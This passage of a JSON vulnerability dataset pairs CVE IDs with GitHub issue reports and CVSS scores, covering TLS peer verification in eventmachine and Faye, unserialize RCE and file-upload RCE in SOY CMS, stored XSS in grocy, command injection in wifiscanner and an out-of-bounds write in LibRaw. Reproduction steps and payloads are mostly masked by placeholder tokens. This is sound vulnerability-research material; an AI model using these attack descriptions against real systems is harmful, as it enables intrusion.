  48433. "description": "Request for improved SSL server certificate verification. From URLTAG I'm not entirely sure if this is the right PR/issue to discuss this on, but I can briefly summarize what EM support I think would be required for implementing SSL clients with server certificate verification, Listed in terms of the exposed libssl APIs: FILETAG Supported in eventmachine/eventmachine NUMBERTAG by extending APITAG FILETAG with SSL_VERIFY_PEER: already supported in EM: URLTAG The APITAG callback MUST return false by default if called with APITAG . The APITAG ignoring the APITAG parameter is the most blatantly broken part of the implementation, because this effectively bypasses all of the libssl certificate validation logic \ud83d\udc7f Based on my reading of the docs and issues like eventmachine/eventmachine NUMBERTAG I suspect this even includes very fundamental things like \"the private key used to sign the session key matches the public key in the certificate\". FILETAG : already supported in URLTAG ? I think the APITAG + APITAG changes would be the bare minimum that would be required. These also match the changes dicussed/implemented in eventmachine/eventmachine NUMBERTAG Additional bonus points for: SSL_get_verify_result NUMBERTAG erify_cert_error_string to allow the application to report more useful error messages than just \"certificate verification failed\" Some convenience wrapper for the cert subject/hostname validation ideally there should be some kind of secure: true/false boolean that doesn't require each client developer to research and write their own certificate verification wrappers for the vast majority of usecases I think Ruby's APITAG URLTAG can probably be used by applications together with the APITAG API, so it doesn't necessarily need to be part of EM itself.",
  48434. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
  48435. "severity": "HIGH",
  48436. "baseScore": 8.7,
  48437. "impactScore": 5.8,
  48438. "exploitabilityScore": 2.2
  48439. },
  48440. {
  48441. "CVE_ID": "CVE-2020-15133",
  48442. "Issue_Url_old": "https://github.com/faye/faye/issues/524",
  48443. "Issue_Url_new": "https://github.com/faye/faye/issues/524",
  48444. "Repo_new": "faye/faye",
  48445. "Issue_Created_At": "2020-07-19T21:22:57Z",
  48446. "description": "Address em http request warnings about APITAG . APITAG supports making TCP connections via the [ APITAG ][em connect] method. Once the connection is established, the client can initiate a TLS session over the socket by calling [ APITAG ][em start tls]. This method _does not_ verify the server's identity by default, but it does accept an option named APITAG . If this is set, the connection will invoke [ APITAG ][em verify peer], a method supplied by the caller which performs certificate validation. That is, APITAG does not implement such a validation routine itself; it requires the caller to supply one. APITAG makes use of two libraries that use this interface: [em http request][em http] and [faye websocket][faye ws]. The latter is maintained by the Faye project and the former by a third party. In June NUMBERTAG a [security advisory][em advisory] was published relating to the of of this APITAG interface in em http request. This followed an [issue][issue NUMBERTAG reporting the problem and a [pull request][pr NUMBERTAG to fix it. The em http request maintainers decided to address this problem by publishing a patch version release, version NUMBERTAG making the following changes: Importing an [implementation of APITAG ][faraday verify] from the APITAG library (by copying the code, not by linking to this package) Sending APITAG to APITAG only if instructed by the caller Logging a warning if the caller does not ask for peer verification This course of action was chosen in order to alert existing users to insecure behaviour, and giving them an easy remediation for it; enabling peer verification by default may break some existing legitimate clients, for example clients talking to trusted servers using self signed certificates. It is worth noting a couple of things about the APITAG implementation imported into em http request from Faraday. First, Faraday is a common interface over several different Ruby HTTP clients, and em http request is one of its supported adapters. Faraday enables APITAG by default, and therefore patches em http request at runtime to support this. So, this patch exists because Faraday wants peer verification to be default behaviour, and they patched em http request to make it possible. Second, the implementation that em http request has now imported is the very first version of this code committed to Faraday's codebase in July NUMBERTAG released in version NUMBERTAG in January NUMBERTAG This code has been modified a few times since, most recently in October NUMBERTAG before the release of Faraday NUMBERTAG in January NUMBERTAG It is not clear why or how this version of the APITAG code was selected. A cursory inspection of the imported code against [the latest version in Faraday][faraday verify latest], and reading the commit history of this file, indicates the code is doing essentially the same thing in terms of calls to the APITAG module, but has been refactored to clarify control flow and to comply with linter warnings. There has been one [bug fix][fix host] made to the original code to use the hostname from the request URI, not the connection hostname, to verify the certificate (these may differ if the request is sent via a proxy). The code imported into em http request does not include this fix. The Faye project needs to decide how to address this problem. Users that have installed the latest em http request are now seeing warnings in their logs that APITAG is not set. No other functional difference has taken place in these programs; they were already not doing peer verification, what's changed is that their authors now _know_ about it. There are a few things to take into consideration here. The least effort change Faye could make would be to send APITAG to em http request, causing it to verifiy server certificates and removing the warning from users' logs. This would have the effect that the initial request to the server would now be verified. However, since faye websocket suffers from the same non verification problem, the Faye client would be making an unverified connection if it subsequently switched to using APITAG This suggests we should have feature parity between these two network transports so that Faye as a whole can make a consistent guarantee to users; enabling verification for normal HTTP but not for APITAG and taking no further measures, would give users a false sense of security. This prompts the question of what changes faye websocket should make to gain parity. In the FILETAG version of Faye, we rely on the default behaviour of the https and tls modules, which is to verify certificates unless explicitly told otherwise. However, sometimes we want to connect to servers whose certificates are not recognised by the usual system certificate authority (CA), for example servers with self signed certificates, even if only for testing purposes. Node provides a mechanism for this: rather than simply turning verification off with the ERRORTAG option, one can use the ca option to pass one's own set of certificate authorities, rather than using the system one. Thus, a client can still trust a server it knows the certificate of, without opting out of verification entirely and exposing itself to person in the middle attacks. The APITAG implementation in em http request does not support this; it only enables the default paths for APITAG and does not let the user set their own. This means that to talk to a server with a self signed cert one would have to leave APITAG unset. APITAG that explicitly setting APITAG rather than merely leaving it unset still causes the warning to be logged.) So, even if faye websocket were to add the ability to set custom CAs, Faye would not be able offer the same ability we're limited by the functionality offered by em http request. That said, I would still prefer for faye websocket in Ruby to work like its Node counterpart, and for Faye to get as close as we can to that. i.e. it should set APITAG by default, allow it to be unset, and provide a way to supply your own CAs, which should be preferred over unsetting APITAG . This leaves two remaining problems: implementing the required functionality in faye websocket, and supporting APITAG in Faye itself. If both em http request and faye websocket support setting APITAG , then Faye can make use of this functionality. em http request defaults to not setting this option so we should think about the effect if we were to set it by default. If faye websocket defaults to enabling APITAG , and Faye doesn't have any defined behaviour other than to forward the caller's options to each library, then we'll get different behaviour depending on whether we're using HTTP or APITAG which is undesirable. Whichever default we choose, a later release of em http request might change its behaviour. So either way, Faye needs to have an explicit policy about the default value of APITAG to send to these libraries if this option is not set by the caller. At present (in version NUMBERTAG Faye does not support the caller setting any TLS options that are sent to em http request. The only TLS related option it currently sends is APITAG , which it gets from the request URL. As clients currently do not have any control over the setting of this option, they will be getting the same behaviour as if they'd set APITAG . Therefore, defaulting to APITAG may cause a change in behaviour that could constitute a breaking change. There are broadly two categories of situation in which a Faye client would break if APITAG were enabled: The client is not talking to the server it thinks it is, because verification is turned off and the client is being attacked The client is intentionally talking to a server that the system CAs would not recognised, for example a server with a self signed cert I would consider the first situation a bug: this is not intentional usage and the client would benefit from being alerted to the fact it's talking to an untrusted server. Setting APITAG would mean fixing the bug and is therefore not a breaking change. The second situation is intentional and supported usage, and if we set APITAG by default then these clients will stop working. We need to provide these clients with a way to start working again, and would therefore need to expose the APITAG option so they can switch it off. This is not an ideal solution but is the only one open to us given the current functionality exposed in em http request. Exposing this option would constitute a new feature, and breaking these clients in the first place may constitute a breaking change. If Faye defaults to APITAG , then no existing clients would change their behaviour (which may regarded as a bug per the above), and we would have to expose the ability to enable APITAG . This gives us the option of introducing the option as a new feature without a breaking change, but this would still be at least a minor release, not a patch. As regards the implementation, I have [opened a PR][faye ws pr] against faye websocket containing an implementation to add support for APITAG and APITAG . Details and discussion of the implementation should happen on that PR rather than this issue. I am opening this issue to discuss the overall strategy and how everything needs to fit together in Faye. [em]: URLTAG [em connect]: URLTAG [em start tls]: URLTAG [em verify peer]: URLTAG [em http]: URLTAG [faye ws]: URLTAG [faraday]: URLTAG [em advisory]: URLTAG [issue NUMBERTAG URLTAG [pr NUMBERTAG URLTAG [faraday verify]: FILETAG [faraday verify latest]: FILETAG [fix host]: URLTAG [faye ws pr]: URLTAG",
  48447. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
  48448. "severity": "HIGH",
  48449. "baseScore": 8.7,
  48450. "impactScore": 5.8,
  48451. "exploitabilityScore": 2.2
  48452. },
  48453. {
  48454. "CVE_ID": "CVE-2020-15158",
  48455. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/250",
  48456. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/250",
  48457. "Repo_new": "mz-automation/libiec61850",
  48458. "Issue_Created_At": "2020-08-12T05:23:33Z",
  48459. "description": "Possilbe heap buffer overflow when COTP message with invalid size is received. COTP message is size field set to zero can cause invalid memory access.",
  48460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48461. "severity": "CRITICAL",
  48462. "baseScore": 9.8,
  48463. "impactScore": 5.9,
  48464. "exploitabilityScore": 3.9
  48465. },
  48466. {
  48467. "CVE_ID": "CVE-2020-15188",
  48468. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/10",
  48469. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/10",
  48470. "Repo_new": "inunosinsi/soycms",
  48471. "Issue_Created_At": "2020-09-14T12:06:36Z",
  48472. "description": "Unauthenticated Remote Code Execution (RCE) in APITAG Title Unauthenticated Remote Code Execution (RCE) in APITAG Summary Severity: Critical APITAG NUMBERTAG and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the website. The vulnerability is caused by unserializing the form without any restrictions. Impact: Unauthenticated Remote Code Execution via Inquiry Form Attack vector is: Inquiry Form needs to be enabled. Components are: Soy Inquiry Form Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause When the inquiry is submitted and the captcha is taken, form submits APITAG and APITAG , and value is checked as the following. URLTAG By the PHP's official guideline, unserialize is a function that should not be used when user can control the argument APITAG FILETAG APITAG can be generated locally, so it is possible to control this value and use appropriate classes to trigger code execution. Remediation Use APITAG and APITAG instead. I will make a Fix PR as soon as possible.",
  48473. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48474. "severity": "CRITICAL",
  48475. "baseScore": 9.8,
  48476. "impactScore": 5.9,
  48477. "exploitabilityScore": 3.9
  48478. },
  48479. {
  48480. "CVE_ID": "CVE-2020-15189",
  48481. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/9",
  48482. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/9",
  48483. "Repo_new": "inunosinsi/soycms",
  48484. "Issue_Created_At": "2020-09-14T12:05:06Z",
  48485. "description": "Remote Code Execution (RCE) in APITAG Title Remote Code Execution (RCE) in APITAG Summary Severity: High APITAG NUMBERTAG and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross Site Scripting(XSS) vulnerability that was reported earlier can be chained in order to perform a successful remote code execution by redirecting the administrator to load a specially crafted webpage. Impact: XSS to RCE via Inquiry Error and Unrestricted File Upload Attack vector is: Administrator must be logged in. Components are: File Manager Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause The file upload feature in APITAG is using APITAG However, it was found out that mimetype can be fooled to upload a PHP file. There is no feature in APITAG to check the file type so it needs to be manually implemented. URLTAG URLTAG Remediation Please add a file extension check from APITAG URLTAG",
  48486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48487. "severity": "HIGH",
  48488. "baseScore": 7.2,
  48489. "impactScore": 5.9,
  48490. "exploitabilityScore": 1.2
  48491. },
  48492. {
  48493. "CVE_ID": "CVE-2020-15250",
  48494. "Issue_Url_old": "https://github.com/junit-team/junit4/issues/1676",
  48495. "Issue_Url_new": "https://github.com/junit-team/junit4/issues/1676",
  48496. "Repo_new": "junit-team/junit4",
  48497. "Issue_Created_At": "2020-10-14T06:18:11Z",
  48498. "description": "CVETAG doesn't affect versions prior to NUMBERTAG but claims it did. URLTAG says it affects any version prior to NUMBERTAG which is not true as rules didn't exist before NUMBERTAG So the proper range would be NUMBERTAG up to NUMBERTAG This is probably not terribly important but it caused dependabot to cry wolf on projects that are (deliberately) still using older versions like extensions for APITAG NUMBERTAG that happen to be still maintained. The same is/will soon be true for a bunch of other static code analyzers checking oldish code bases.",
  48499. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  48500. "severity": "MEDIUM",
  48501. "baseScore": 5.5,
  48502. "impactScore": 3.6,
  48503. "exploitabilityScore": 1.8
  48504. },
  48505. {
  48506. "CVE_ID": "CVE-2020-15253",
  48507. "Issue_Url_old": "https://github.com/grocy/grocy/issues/996",
  48508. "Issue_Url_new": "https://github.com/grocy/grocy/issues/996",
  48509. "Repo_new": "grocy/grocy",
  48510. "Issue_Created_At": "2020-09-08T14:34:09Z",
  48511. "description": "XSS and HTML Injection on Create Shopping List APITAG upon deleting it). Vulnerability Name: Stored Cross Site Scripting & HTML Injection Vulnerability Description: grocy household management solution NUMBERTAG allows stored XSS and HTML Injection, via Create Shopping List module, that is rendered upon deletiing that Shopping List. Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. HTML injection occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. Consequences can be disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Vulnerable URL: URLTAG Payload NUMBERTAG APITAG NUMBERTAG APITAG HTML Injection APITAG Steps to Reproduce NUMBERTAG Login to the application NUMBERTAG Go to APITAG List' module NUMBERTAG Click on APITAG Shopping List' module NUMBERTAG Enter the payload: APITAG in APITAG input field NUMBERTAG Click Save NUMBERTAG Click APITAG Shopping List' Request: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content type: application/json Content Length NUMBERTAG Connection: close Cookie: APITAG {\"name\":\" APITAG \"}",
  48512. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48513. "severity": "MEDIUM",
  48514. "baseScore": 4.8,
  48515. "impactScore": 2.7,
  48516. "exploitabilityScore": 1.7
  48517. },
  48518. {
  48519. "CVE_ID": "CVE-2020-15254",
  48520. "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam/issues/539",
  48521. "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam/issues/539",
  48522. "Repo_new": "crossbeam-rs/crossbeam",
  48523. "Issue_Created_At": "2020-08-03T20:42:22Z",
  48524. "description": "Memory Leak in crossbeam queue APITAG APITAG git only, ver NUMBERTAG is not effected). Hi. I'm Yoshi, a APITAG student at CMU. We are currently evaluating a project that aims to automatically synthesize test cases for Rust libraries. We ran the synthesized test cases with Miri, and it reports what appears to be a memory leak. The minimum example is: APITAG ERRORTAG It looks like the drop destructor is not erasing enough memory. You can also catch this with by running cargo miri test inside crossbeam queue. One of your manually written test cases ( capacity ) will induce the same behavior. The first commit to have this issue is APITAG URLTAG . You can confirm this by running cargo miri test on NUMBERTAG commit before. It will not terminate because Miri is extremely slow, but you can see that it gets past capacity test case. As for the root cause, I suspect that the drop function needs to be modified to match the changes to new , but I am yet to get a PR up. In case this is intended behavior, or you would prefer if I focused on other parts of the code, please let me know. Thanks APITAG",
  48525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48526. "severity": "CRITICAL",
  48527. "baseScore": 9.8,
  48528. "impactScore": 5.9,
  48529. "exploitabilityScore": 3.9
  48530. },
  48531. {
  48532. "CVE_ID": "CVE-2020-15261",
  48533. "Issue_Url_old": "https://github.com/veyon/veyon/issues/657",
  48534. "Issue_Url_new": "https://github.com/veyon/veyon/issues/657",
  48535. "Repo_new": "veyon/veyon",
  48536. "Issue_Created_At": "2020-09-01T06:12:58Z",
  48537. "description": "Unquoted service path. Hi Veyon team, After installing Veyon NUMBERTAG I noticed that its service, APITAG is hijackable due to the unquoted service path. Using this vulnerability, attackers can execute different files as APITAG It allows local users to replace the service with arbitrary code to escalate their privileges. I hope you check this link for more details: CVETAG",
  48538. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48539. "severity": "MEDIUM",
  48540. "baseScore": 6.7,
  48541. "impactScore": 5.9,
  48542. "exploitabilityScore": 0.8
  48543. },
  48544. {
  48545. "CVE_ID": "CVE-2020-15262",
  48546. "Issue_Url_old": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
  48547. "Issue_Url_new": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
  48548. "Repo_new": "waysact/webpack-subresource-integrity",
  48549. "Issue_Created_At": "2020-10-18T00:48:41Z",
  48550. "description": "Tags are injected with integrity=\"undefined\" on NUMBERTAG I'm on Webpack NUMBERTAG and noticed after upgrading to this plugin's NUMBERTAG release that injected tags have an ERRORTAG integrity. Tags inserted by via html webpack plugin have the correct integrity so the app doesn't fail to load, but dynamically injected tags use ERRORTAG and the integrity check is bypassed. Here's what Firefox prints: ERRORTAG Downgrading to NUMBERTAG fixes this issue so I'm assuming it's related to the changes that added Webpack NUMBERTAG support in NUMBERTAG",
  48551. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  48552. "severity": "LOW",
  48553. "baseScore": 3.7,
  48554. "impactScore": 1.4,
  48555. "exploitabilityScore": 2.2
  48556. },
  48557. {
  48558. "CVE_ID": "CVE-2020-15265",
  48559. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42105",
  48560. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42105",
  48561. "Repo_new": "tensorflow/tensorflow",
  48562. "Issue_Created_At": "2020-08-06T20:40:42Z",
  48563. "description": "Segmentation fault in APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG produces a segfault when input is a tensor in any shape of APITAG or APITAG and axis is specified to a large number. Describe the expected behavior No segfault Standalone code to reproduce the issue APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG",
  48564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48565. "severity": "HIGH",
  48566. "baseScore": 7.5,
  48567. "impactScore": 3.6,
  48568. "exploitabilityScore": 3.9
  48569. },
  48570. {
  48571. "CVE_ID": "CVE-2020-15266",
  48572. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42129",
  48573. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42129",
  48574. "Repo_new": "tensorflow/tensorflow",
  48575. "Issue_Created_At": "2020-08-07T15:04:14Z",
  48576. "description": "segfault in APITAG when boxes contains large value. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG segfault when there is a very large value in boxes . Can also be reproduced in nightly version Describe the expected behavior Expect no segfault Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG APITAG NUMBERTAG box_indices NUMBERTAG crop_size NUMBERTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. ~~~python Segmentation fault (core dumped) ~~~",
  48577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48578. "severity": "HIGH",
  48579. "baseScore": 7.5,
  48580. "impactScore": 3.6,
  48581. "exploitabilityScore": 3.9
  48582. },
  48583. {
  48584. "CVE_ID": "CVE-2020-15362",
  48585. "Issue_Url_old": "https://github.com/thingsSDK/wifiscanner/issues/1",
  48586. "Issue_Url_new": "https://github.com/thingssdk/wifiscanner/issues/1",
  48587. "Repo_new": "thingssdk/wifiscanner",
  48588. "Issue_Created_At": "2020-06-11T03:20:43Z",
  48589. "description": "Remote Code Execution Bug due to Improper Input Sanitization. This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice. The following code snippets in the FILETAG is responsible for the issue. ERRORTAG As we can see, _ APITAG _ is not sanitized in anyway prior to being passed to the APITAG . Hence, the following payloads can be used to execute arbitrary commands: Exploit NUMBERTAG ERRORTAG Exploit NUMBERTAG ERRORTAG User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.",
  48590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48591. "severity": "CRITICAL",
  48592. "baseScore": 9.8,
  48593. "impactScore": 5.9,
  48594. "exploitabilityScore": 3.9
  48595. },
  48596. {
  48597. "CVE_ID": "CVE-2020-15365",
  48598. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/301",
  48599. "Issue_Url_new": "https://github.com/libraw/libraw/issues/301",
  48600. "Repo_new": "libraw/libraw",
  48601. "Issue_Created_At": "2020-06-15T14:19:19Z",
  48602. "description": "Libraw APITAG Out of bounds write vulnerability. Description An out of bounds write vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered by changing the APITAG from \"CMT1\" to an unknown name and making the \"tiff_nifds\" field equals zero. Steps to Reproduce (poc archive password= girlelecta). URLTAG cmd: FILETAG convert poc.cr3 FILETAG Upon running this, following crash happens only in APITAG NUMBERTAG APITAG I enabled page heap on FILETAG ): Microsoft (R) Windows Debugger Version NUMBERTAG AMD NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG PATHTAG convert e:\\poc.cr3 FILETAG Path validation summary Response Time (ms) Location Deferred srv Symbol search path is: srv Executable search path is: APITAG NUMBERTAG ff7 APITAG NUMBERTAG a NUMBERTAG FILETAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG ntdll.dll APITAG NUMBERTAG ffc APITAG d4dc NUMBERTAG PATHTAG Page heap: pid NUMBERTAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ea NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cb2ab NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cafeb NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ecb3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eee3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee5ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca9ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cd6a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d2f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4ce NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d NUMBERTAG ba NUMBERTAG PATHTAG APITAG NUMBERTAG a2 APITAG eed0a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edcd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eecc NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed4b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2be NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec4ca NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eb NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eba2b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eed NUMBERTAG PATHTAG APITAG Break instruction exception code NUMBERTAG first chance) APITAG NUMBERTAG ffc ef NUMBERTAG c cc int NUMBERTAG g APITAG NUMBERTAG ffc APITAG eed7e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG e NUMBERTAG af NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca7f NUMBERTAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. WARNING: Unable to verify checksum for PATHTAG APITAG NUMBERTAG ffc APITAG f3b2d NUMBERTAG c NUMBERTAG k Child SP APITAG Call Site NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG ee APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG d0bf5 APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG a NUMBERTAG de APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG ab NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG bdfc8 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG e NUMBERTAG a NUMBERTAG APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG c NUMBERTAG c6c NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG c NUMBERTAG a3 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG a NUMBERTAG f APITAG cae5aac3 APITAG PATHTAG NUMBERTAG b NUMBERTAG f APITAG caef NUMBERTAG ae APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for magick.exe NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG ea APITAG PATHTAG NUMBERTAG d NUMBERTAG f APITAG NUMBERTAG APITAG PATHTAG NUMBERTAG e NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!wmain NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f APITAG NUMBERTAG e NUMBERTAG magick!invoke_main NUMBERTAG PATHTAG NUMBERTAG f APITAG NUMBERTAG cfe APITAG PATHTAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!__scrt_common_main NUMBERTAG e PATHTAG NUMBERTAG f APITAG ee NUMBERTAG bd4 APITAG PATHTAG NUMBERTAG f APITAG ef5ace NUMBERTAG APITAG NUMBERTAG f APITAG NUMBERTAG APITAG NUMBERTAG u APITAG PATHTAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG a e NUMBERTAG b NUMBERTAG jmp APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG mov edx,dword ptr [rsp NUMBERTAG h NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG b e NUMBERTAG ddfbff call APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG f5ac0 cvtsd2ss xmm0,xmm NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG c f NUMBERTAG f NUMBERTAG ef NUMBERTAG movss dword ptr [ra NUMBERTAG EF NUMBERTAG h],xmm0 System Configuration APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so 